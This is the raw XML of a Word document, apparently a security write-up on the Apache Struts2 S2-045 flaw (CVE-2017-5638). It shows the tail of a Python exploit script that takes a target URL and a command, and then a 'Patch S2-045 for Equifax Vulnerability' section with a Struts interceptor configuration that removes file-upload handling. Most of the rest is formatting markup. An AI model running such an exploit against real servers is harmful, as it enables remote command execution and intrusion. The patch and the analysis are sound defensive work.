    </w:p>
    <w:p w14:paraId="223ADEC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 struts2_S2-045.py &lt;url&gt; &lt;cmd&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4781BE1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lastRenderedPageBreak/>
        <w:t>    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5766D9A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 CVE: 2017-5638 - Apache Struts2 S2-045')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB9300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url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sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73DA7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cmd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sys.argv[2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90552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 cmd: %s\n"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052092AB" w14:textId="6911DF95" w:rsidR="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="000E4CC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        exploit(url, cmd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBB5874" w14:textId="77777777" w:rsidR="00582DA9" w:rsidRPr="000E4CC2" w:rsidRDefault="00582DA9" w:rsidP="000E4CC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E399FEB" w14:textId="0AA43DC3" w:rsidR="004D5F52" w:rsidRDefault="00F92C02" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch S2-045 for </w:t>
      </w:r>
      <w:r w:rsidR="00582DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Equifax Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3721B19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&lt;interceptors&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A608C8"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&lt;interceptor-stack name="defaultWithoutUpload"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB92DB"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name="exception"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DD03A"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name="alias"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B99ED6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name="servletConfig"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B365CD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name="i18n"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F939F4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name="prepare"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D517EF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name="chain"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7FC6D4"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name="scopedModelDriven"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FBA6B4"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name="modelDriven"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B37329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name="checkbox"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D882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name="datetime"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697E09B3"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name="multiselect"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234712B0"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name="staticParams"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4AAAC"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name="actionMappingParams"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6034864A"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name="params"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A109DD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name="conversionError"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A83726E"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name="validation"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC9CA71"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&lt;param name="excludeMethods"&gt;input,back,cancel,browse&lt;/param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B681AC7"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&lt;/interceptor-ref&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D83A4F"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name="workflow"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69419F78"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&lt;param name="excludeMethods"&gt;input,back,cancel,browse&lt;/param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158FB655"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&lt;/interceptor-ref&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45529865"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name="debugging"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD3967"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&lt;/interceptor-stack&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7FEEAB"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&lt;/interceptors&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4168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&lt;default-interceptor-ref name="defaultWithoutUpload"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E20667" w14:textId="77777777" w:rsidR="00582DA9" w:rsidRPr="007D02A2" w:rsidRDefault="00582DA9" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00582DA9" w:rsidRPr="007D02A2" w:rsidSect="00C73724">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760A5" w14:textId="77777777" w:rsidR="00CF097D" w:rsidRDefault="00CF097D" w:rsidP="00BB1E04">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F3F593B" w14:textId="77777777" w:rsidR="00CF097D" w:rsidRDefault="00CF097D" w:rsidP="00BB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253409"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="30EBE6B1" w14:textId="7A3E886C" w:rsidR="00C73724" w:rsidRDefault="00C73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661C7" w14:textId="77777777" w:rsidR="00C73724" w:rsidRDefault="00C73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42066"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="2D4E271E" w14:textId="60380C25" w:rsidR="00C73724" w:rsidRDefault="00C73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2B7C58" w14:textId="77777777" w:rsidR="00C73724" w:rsidRDefault="00C73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A8C87" w14:textId="77777777" w:rsidR="00CF097D" w:rsidRDefault="00CF097D" w:rsidP="00BB1E04">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19811DE9" w14:textId="77777777" w:rsidR="00CF097D" w:rsidRDefault="00CF097D" w:rsidP="00BB1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33637"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F1E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08424C"/>
    <w:rsid w:val="000E1B63"/>
    <w:rsid w:val="000E4CC2"/>
    <w:rsid w:val="00104B7E"/>
    <w:rsid w:val="001B2958"/>
    <w:rsid w:val="00215C83"/>
    <w:rsid w:val="00294E93"/>
    <w:rsid w:val="0030178C"/>
    <w:rsid w:val="00316267"/>
    <w:rsid w:val="003946C8"/>
    <w:rsid w:val="00416C2F"/>
    <w:rsid w:val="004D5F52"/>
    <w:rsid w:val="004F28D1"/>
    <w:rsid w:val="00566573"/>
    <w:rsid w:val="00582DA9"/>
    <w:rsid w:val="005E0AB2"/>
    <w:rsid w:val="00681BF6"/>
    <w:rsid w:val="006B474D"/>
    <w:rsid w:val="00725DD1"/>
    <w:rsid w:val="007652B8"/>
    <w:rsid w:val="007D02A2"/>
    <w:rsid w:val="00882C80"/>
    <w:rsid w:val="009012BF"/>
    <w:rsid w:val="00927312"/>
    <w:rsid w:val="00BB1E04"/>
    <w:rsid w:val="00C50AF5"/>
    <w:rsid w:val="00C73724"/>
    <w:rsid w:val="00C739BD"/>
    <w:rsid w:val="00C742FB"/>
    <w:rsid w:val="00C921B0"/>
    <w:rsid w:val="00CF097D"/>
    <w:rsid w:val="00D87BE5"/>
    <w:rsid w:val="00DF2F57"/>
    <w:rsid w:val="00E36FC7"/>
    <w:rsid w:val="00E943C8"/>
    <w:rsid w:val="00EA4394"/>
    <w:rsid w:val="00F92C02"/>
    <w:rsid w:val="00F9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 w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D5F52"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D5F52"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB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04"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB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04"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00927312"/>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0E4CC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66573"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0039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0221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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224224110">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1534415111">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1816334693">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1864703958">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1903101338">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1845046064">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1555579900">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1032726930">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1412460001">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1971205122">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="983630199">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="747073792">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="796214509">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1422096545">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1516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0293">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="408425874">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="926233564">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1295866141">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1411610385">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1941638044">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1624732768">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="970407821">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="413741761">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="531528785">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1761439841">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1507398185">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1131095047">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1016928998">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="688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544">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="761343618">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1905337164">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1022826987">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2041389767">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>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 w:id="1284768397">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1">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
